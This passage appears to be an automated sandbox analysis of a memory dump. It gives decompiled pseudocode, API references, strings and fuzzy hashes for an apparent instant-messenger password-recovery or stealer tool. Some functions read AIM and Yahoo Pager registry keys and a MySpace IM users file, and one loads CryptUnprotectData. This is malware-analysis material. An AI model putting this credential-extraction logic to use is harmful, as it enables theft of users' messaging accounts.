				if( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)) > 0) {
					do {
						_t35 = E0040779F(_t58, _t44);
						0x413d74("/sort", _t35);
						if(_t35 == 0) {
							_t7 = _t58 + 1; // 0x1
							_t51 = E0040779F(_t7,  *((intOrPtr*)(_t40 + 0x398)));
							_t66 =  *_t51 - 0x7e;
							_t38 =  *((intOrPtr*)(_t40 + 0x390));
							if( *_t51 != 0x7e) {
								_push(0);
							} else {
								_push(1);
								_t51 = _t51 + 1;
							}
							_push(_t51);
							E0040AE7D(_t38, _t66);
						}
						_t44 =  *((intOrPtr*)(_t40 + 0x398));
						_t58 = _t58 + 1;
					} while (_t58 <  *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x398)) + 0x30)));
				}
				E0040671B();
				 *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)) + 0x28)) = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t40 + 0x390)))) + 0x5c))();
				if(E004077AF( *((intOrPtr*)(_t40 + 0x398)), ?str?, 0xffffffff) == 0xffffffff) {
					_t69 =  *0x41e394; // 0x1
					_t41 =  *((intOrPtr*)(_t40 + 0x390));
					if(_t69 == 0) {
						 *0x41e398 =  *((intOrPtr*)(_t41 + 0x1ac));
						 *0x41e394 = 1;
					}
					_t30 =  *((intOrPtr*)( *_t41 + 0x60))(E0040AE57);
					qsort( *((intOrPtr*)( *_t41 + 0x64))(), 0,  *(_t41 + 0x28), _t30);
				}
				return SetCursor( *0x41dbd8);
			}

0x0040b2f8
0x0040b311
0x0040b313
0x0040b315
0x0040b316
0x0040b31e
0x0040b323
0x0040b325
0x0040b327
0x0040b332
0x0040b33b
0x0040b343
0x0040b34b
0x0040b34d
0x0040b350
0x0040b356
0x0040b35d
0x0040b358
0x0040b358
0x0040b35a
0x0040b35a
0x0040b35e
0x0040b35f
0x0040b35f
0x0040b364
0x0040b36a
0x0040b36b
0x0040b325
0x0040b370
0x0040b37b
0x0040b386
0x0040b39e
0x0040b3a0
0x0040b3a6
0x0040b3ac
0x0040b3b4
0x0040b3b9
0x0040b3b9
0x0040b3cf
0x0040b3dd
0x0040b3e2
0x0040b3f4

APIs

_mbsicmp.MSVCRT ref: 0040B332
qsort.MSVCRT ref: 0040B3DD
SetCursor.USER32 ref: 0040B3EB

Strings

/sort, xrefs: 0040B32D
/nosort, xrefs: 0040B391

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Cursor_mbsicmpqsort
String ID: /nosort$/sort
API String ID: 882979914-1578091866
Opcode ID: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
Instruction ID: c642ed81bba6fc27793a5d708b6807a860a9cb0bcd27181b40ce8d315371ea34
Opcode Fuzzy Hash: aca6ef3a54d3682c88ae91ffd4c16f467d4d6d8ebe203e6f6b8079e39e5b1455
Instruction Fuzzy Hash: 3721A231600200DFDB05EF25C8C1E9577A9EF85728F2400BAFD19AF2D2CB79A841CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00413735, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00413757

Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

Part of subcall function 00411D82: RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF

Strings

Software\Yahoo\Pager, xrefs: 00413763
EOptions string, xrefs: 00413791
Yahoo! User ID, xrefs: 0041377C

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpenQueryValuememset
String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
API String ID: 1830152886-1703613266
Opcode ID: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
Instruction ID: 02697a5e3e6c6c3f452774ad5988b122dd70f79e91add571e9a1c89a2d7602b2
Opcode Fuzzy Hash: 97c6f1d67ff91e2b20a0c02c3cf9c7012dd61d188e09fd72fdd0fd453f24f1e9
Instruction Fuzzy Hash: 9301F9B6B00104FFEF106A95AD42ADA7BACDF04315F10406BFE04F3251E675AF8586AC

Uniqueness

Uniqueness Score: -1.00%

Function 00412396, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 004123A6
SHBrowseForFolder.SHELL32(?), ref: 004123D8
SHGetPathFromIDList.SHELL32(00000000,?), ref: 004123EC
_mbscpy.MSVCRT ref: 004123FF

Strings

[@, xrefs: 004123B6

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: BrowseFolderFromListMallocPath_mbscpy
String ID: [@
API String ID: 1479990042-3416412563
Opcode ID: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
Instruction ID: 5ef3e47e4b44953a2dad9ee1bf13406931f922e9c8d23326f6bb0268a582906b
Opcode Fuzzy Hash: 0ed61469ac53670edaa810a2117bfc786e2c3e1837aac1e3952743f7bc219d88
Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00408C31, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00408C31(CHAR* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;

				0x414060();
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				GetPrivateProfileStringA(0x41e308, _a4, 0x417c88,  &_v4104, 0x1000, 0x41e200);
				if(_v4104 == 0) {
					return 0;
				} else {
					0x413d0c(_a8,  &_v4104);
					return 1;
				}
			}

0x00408c39
0x00408c4e
0x00408c55
0x00408c77
0x00408c85
0x00408ca0
0x00408c87
0x00408c91
0x00408c9c
0x00408c9c

APIs

memset.MSVCRT ref: 00408C55
GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
_mbscpy.MSVCRT ref: 00408C91

Strings

?@, xrefs: 00408C31
<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString_mbscpymemset
String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
API String ID: 408644273-2377969721
Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC

Uniqueness

Uniqueness Score: -1.00%

Function 00406830, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406830(long __eax, struct HWND__* _a4) {
				char _v1028;
				char _v2052;
				void* __edi;
				long _t15;

				_t15 = __eax;
				if(__eax == 0) {
					_t15 = GetLastError();
				}
				E00406735(_t15,  &_v1028);
				_push( &_v1028);
				_push(_t15);
				sprintf( &_v2052, "Error %d: %s");
				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
			}

0x0040683a
0x0040683e
0x00406846
0x00406846
0x0040684f
0x0040685a
0x0040685b
0x00406868
0x00406889

APIs

GetLastError.KERNEL32 ref: 00406840
sprintf.MSVCRT ref: 00406868
MessageBoxA.USER32(?,?,Error,00000030), ref: 00406881

Strings

Error, xrefs: 00406872
Error %d: %s, xrefs: 00406862

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ErrorLastMessagesprintf
String ID: Error$Error %d: %s
API String ID: 1670431679-1552265934
Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004108FA, Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC

memset.MSVCRT ref: 00410939
memset.MSVCRT ref: 0041097A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$AddressLibraryLoadProc
String ID:
API String ID: 95357979-0
Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040C929, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040C929(signed int __eax, void* __ecx, void* _a4) {
				unsigned int _t23;
				signed int _t25;
				unsigned int _t34;
				unsigned int _t36;
				void* _t40;
				unsigned int _t45;
				void* _t46;
				int _t47;
				void* _t48;
				void* _t50;

				_t48 = __ecx;
				_t34 = __eax;
				_t23 =  *(__ecx + 0x10);
				_t36 = _t23 + __eax * 8;
				 *(__ecx + 0x10) = _t36;
				if(_t36 < _t23) {
					 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + 1;
				}
				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t48 + 0x14)) + (_t34 >> 0x1d);
				_t25 = _t23 >> 0x00000003 & 0x0000003f;
				if(_t25 == 0) {
					L6:
					if(_t34 >= 0x40) {
						_t45 = _t34 >> 6;
						do {
							memcpy(_t48 + 0x18, _a4, 0x40);
							_t50 = _t50 + 0xc;
							E0040CA46(_t48 + 0x18, _t48);
							_a4 = _a4 + 0x40;
							_t34 = _t34 - 0x40;
							_t45 = _t45 - 1;
						} while (_t45 != 0);
					}
					_push(_t34);
					_push(_a4);
					_push(_t48 + 0x18);
				} else {
					_t46 = 0x40;
					_t47 = _t46 - _t25;
					_t40 = _t48 + 0x18 + _t25;
					if(_t34 >= _t47) {
						memcpy(_t40, _a4, _t47);
						_t50 = _t50 + 0xc;
						E0040CA46(_t48 + 0x18, _t48);
						_a4 = _a4 + _t47;
						_t34 = _t34 - _t47;
						goto L6;
					} else {
						_push(_t34);
						_push(_a4);
						_push(_t40);
					}
				}
				return memcpy();
			}

0x0040c92e
0x0040c930
0x0040c932
0x0040c935
0x0040c93b
0x0040c93e
0x0040c940
0x0040c940
0x0040c948
0x0040c94e
0x0040c951
0x0040c983
0x0040c986
0x0040c98a
0x0040c98d
0x0040c996
0x0040c99b
0x0040c9a3
0x0040c9a8
0x0040c9ac
0x0040c9af
0x0040c9af
0x0040c98d
0x0040c9b2
0x0040c9b3
0x0040c9b9
0x0040c953
0x0040c955
0x0040c956
0x0040c95a
0x0040c95e
0x0040c96c
0x0040c971
0x0040c979
0x0040c97e
0x0040c981
0x00000000
0x0040c960
0x0040c960
0x0040c961
0x0040c964
0x0040c964
0x0040c95e
0x0040c9c6

APIs

memcpy.MSVCRT ref: 0040C96C
memcpy.MSVCRT ref: 0040C996
memcpy.MSVCRT ref: 0040C9BA

Strings

@, xrefs: 0040C983
@, xrefs: 0040C9A8

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID: @$@
API String ID: 3510742995-149943524
Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 00410B95, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410BB7
memset.MSVCRT ref: 00410BCE

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

strlen.MSVCRT ref: 00410BEA
strlen.MSVCRT ref: 00410BF9

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

MySpace\IM\users.txt, xrefs: 00410BE4, 00410BE9, 00410C0D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memsetstrlen$FolderPathSpecial_mbscat_mbscpy
String ID: MySpace\IM\users.txt
API String ID: 1027419547-1720829597
Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A455, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E0040A455(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v259;
				char _v260;
				char* _t30;
				signed int _t33;
				char* _t44;
				void* _t46;

				E004067EC(_a4, "<item>");
				_t33 = 0;
				if( *((intOrPtr*)(__edi + 0x20)) > 0) {
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						 *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4),  *((intOrPtr*)(__edi + 0x4c)));
						0x41244b();
						_t44 =  &_v260;
						E00409DD6(_t44,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t33 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
						_t30 = _t44;
						_push(_t30);
						_push( *((intOrPtr*)(__edi + 0x50)));
						_push(_t30);
						sprintf( *(__edi + 0x54), "<%s>%s</%s>");
						E004067EC(_a4,  *(__edi + 0x54));
						_t46 = _t46 + 0x28;
						_t33 = _t33 + 1;
					} while (_t33 <  *((intOrPtr*)(__edi + 0x20)));
				}
				return E004067EC(_a4, "</item>");
			}

0x0040a467
0x0040a46c
0x0040a473
0x0040a476
0x0040a484
0x0040a48b
0x0040a4a2
0x0040a4a7
0x0040a4b6
0x0040a4bc
0x0040a4c1
0x0040a4c3
0x0040a4c4
0x0040a4c7
0x0040a4d0
0x0040a4db
0x0040a4e0
0x0040a4e3
0x0040a4e4
0x0040a4e9
0x0040a4fb

APIs

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

memset.MSVCRT ref: 0040A48B

Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9

Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E

sprintf.MSVCRT ref: 0040A4D0

Strings

<item>, xrefs: 0040A45F
<%s>%s</%s>, xrefs: 0040A4C8
</item>, xrefs: 0040A4EA

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 3337535707-2769808009
Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1EC, Relevance: 7.6, APIs: 5, Instructions: 57
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040B1EC(void* __ebx) {
				void* __esi;
				void* _t18;
				void* _t37;

				_t37 = __ebx;
				_t18 = E00401033();
				if(_t18 == 0x37e9) {
					memcpy( *((intOrPtr*)(__ebx + 0x390)) + 0x1d4,  *(__ebx + 0x38c), 0x1c8 << 2);
					asm("movsw");
					asm("movsb");
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0xb, 0, 0);
					E0040671B();
					 *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)) + 0x28)) = 0;
					SendMessageA( *( *((intOrPtr*)(__ebx + 0x390)) + 0x184), 0x1009, 0, 0);
					if(E004028E7() == 0) {
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ebx + 0x390)))) + 0x5c))();
					}
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x390)))) + 0x74))(1);
					E0040B15B(_t37);
					SetCursor( *0x41dbd8);
					SetFocus( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184));
					return SendMessageA( *( *((intOrPtr*)(_t37 + 0x390)) + 0x184), 0xb, 1, 0);
				}
				return _t18;
			}

0x0040b1ec
0x0040b1ec
0x0040b1f6
0x0040b216
0x0040b218
0x0040b21d
0x0040b233
0x0040b235
0x0040b242
0x0040b256
0x0040b25f
0x0040b269
0x0040b269
0x0040b276
0x0040b27b
0x0040b286
0x0040b298
0x00000000
0x0040b2b3
0x0040b2b4

APIs

SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233

Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256

Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934

SetCursor.USER32(?,?,0040C35B), ref: 0040B286
SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
String ID:
API String ID: 1022157474-0
Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68

Uniqueness

Uniqueness Score: -1.00%

Function 00408A69, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408A69(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00406DA8(_t30);
				}
				return 1;
			}

0x00408a74
0x00408a77
0x00408a81
0x00408a88
0x00408a93
0x00408aa3
0x00408ab1
0x00408ab9
0x00408abf
0x00408ac5
0x00408aca
0x00408acd
0x00408ad2
0x00408ad8

APIs

GetParent.USER32(?), ref: 00408A7B
GetWindowRect.USER32(?,?), ref: 00408A88
GetClientRect.USER32(00000000,?), ref: 00408A93
MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$Rect$ClientParentPoints
String ID:
API String ID: 4247780290-0
Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A627, Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040A627(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				E004067EC(_a4, "<?xml version="1.0"  encoding="ISO-8859-1" ?>");
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				E00409DD6(_t28, _t17);
				_push(_t28);
				sprintf( &_v516, "<%s>");
				return E004067EC(_a4,  &_v516);
			}

0x0040a641
0x0040a643
0x0040a64a
0x0040a659
0x0040a660
0x0040a66d
0x0040a679
0x0040a67d
0x0040a683
0x0040a68a
0x0040a697
0x0040a6b1

APIs

memset.MSVCRT ref: 0040A64A
memset.MSVCRT ref: 0040A660

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E

sprintf.MSVCRT ref: 0040A697

Strings

<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
<%s>, xrefs: 0040A691

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3699762281-1998499579
Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409370, Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040937C
??3@YAXPAX@Z.MSVCRT ref: 0040938A
??3@YAXPAX@Z.MSVCRT ref: 0040939B
??3@YAXPAX@Z.MSVCRT ref: 004093B2
??3@YAXPAX@Z.MSVCRT ref: 004093BB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C

Uniqueness

Uniqueness Score: -1.00%

Function 004093D6, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E004093D6(intOrPtr* __edi) {
				void* __esi;
				intOrPtr* _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x418528;
				E00409370(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00407491(_t21);
					0x413d56(_t21);
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00407491(_t22);
					0x413d56(_t22);
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00407491(_t23);
					0x413d56(_t23);
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00407491(_t24);
					0x413d56(_t24);
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				0x413de6( *_t7);
				return _t7;
			}

0x004093d6
0x004093d9
0x004093df
0x004093e4
0x004093e9
0x004093eb
0x004093f1
0x004093f6
0x004093f7
0x004093fc
0x004093fe
0x00409404
0x00409409
0x0040940a
0x0040940f
0x00409411
0x00409417
0x0040941c
0x0040941d
0x00409422
0x00409424
0x0040942a
0x0040942f
0x00409430
0x0040943a
0x0040943e
0x00409444

APIs

Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB

??3@YAXPAX@Z.MSVCRT ref: 004093F1
??3@YAXPAX@Z.MSVCRT ref: 00409404
??3@YAXPAX@Z.MSVCRT ref: 00409417
??3@YAXPAX@Z.MSVCRT ref: 0040942A
??3@YAXPAX@Z.MSVCRT ref: 0040943E

Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
